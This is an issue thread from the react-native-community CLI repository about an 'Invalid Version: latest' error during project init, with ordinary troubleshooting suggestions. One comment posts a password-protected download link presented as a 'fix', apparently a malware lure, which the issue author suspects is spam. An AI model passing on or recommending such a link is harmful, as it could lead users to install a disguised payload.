### ISSUE TITLE
Installing react native with error invalid version latest

### ISSUE THREAD

**Issue by umardev500** [react-native-community/cli#2486]
npx @react-native-community/cli@latest init AwesomeProject
error Invalid Version: latest.
TypeError: Invalid Version: latest
    at new SemVer (/home/umar/.npm/_npx/2788f5fbd47acb89/node_modules/semver/classes/semver.js:38:13)
    at compare (/home/umar/.npm/_npx/2788f5fbd47acb89/node_modules/semver/functions/compare.js:3:3)
    at Object.lt (/home/umar/.npm/_npx/2788f5fbd47acb89/node_modules/semver/functions/lt.js:2:29)
    at createTemplateUri (/home/umar/.npm/_npx/2788f5fbd47acb89/node_modules/@react-native-community/cli/build/commands/init/init.js:334:47)
    at createProject (/home/umar/.npm/_npx/2788f5fbd47acb89/node_modules/@react-native-community/cli/build/commands/init/init.js:371:29)
    at Object.initialize [as func] (/home/umar/.npm/_npx/2788f5fbd47acb89/node_modules/@react-native-community/cli/build/commands/init/init.js:452:13)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async Command.handleAction (/home/umar/.npm/_npx/2788f5fbd47acb89/node_modules/@react-native-community/cli/build/index.js:116:9)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by umardev500** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

what was that? not make sure that is safe

**Comment by szymonrybczak** [comment]
Seems to work for me, could you please try with `--verbose` option?

**Comment by umardev500** [comment]
> > to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."
> 
> what was that? not make sure is that safe?

where is guy guide me to this link he leaving the thread i think he is spammer

**Comment by umardev500** [comment]
> Seems to work for me, could you please try with `--verbose` option?

with --verbose same resul as above

**Comment by umardev500** [comment]
> Seems to work for me, could you please try with `--verbose` option?

![Uploading verbose.png…]()

**Comment by umardev500** [comment]
> Seems to work for me, could you please try with `--verbose` option?

![verbose](https://github.com/user-attachments/assets/7041481a-735e-4a7a-9b16-abee1ba8995f)

**Comment by umardev500** [comment]
The error i think in this react-native-comunity or somethinng else

i fixed this issue with specify version for react native template

npx @react-native-community/cli@latest init MyApp --version 0.75.2

**Comment by vishuk570** [comment]
I am getting same issue 

> The error i think in this react-native-comunity or somethinng else
> 
> i fixed this issue with specify version for react native template
> 
> npx @react-native-community/cli@latest init MyApp --version 0.75.2

This is not working for me.

**Comment by Ashif-FMG** [comment]
This is not working for me . I'm getting the same error

**Comment by blakef** [comment]
If you see the `"Failed to get correct version for 'latest', TypeError: fetch failed"` that means the CLI is unable to figure out what `latest` maps to.  It reaches out to npm to do this.  **This is probably a transient or local configuration issue**.

If the CLI can't do that it's not going to work.  This is a transient issue because you're having network issues.  You can manually break the problem down:
1. Is npm configured correctly?  Does `npm config get registry --workspaces=false --include-workspace-root` give a valid registry?  This should be `https://registry.npmjs.org/`
2. Is node configured strangely?  This should always succeed: `node -p 'fetch("https://registry.npmjs.org/react-native/latest").then(r => r.json()).then(console.log)'`
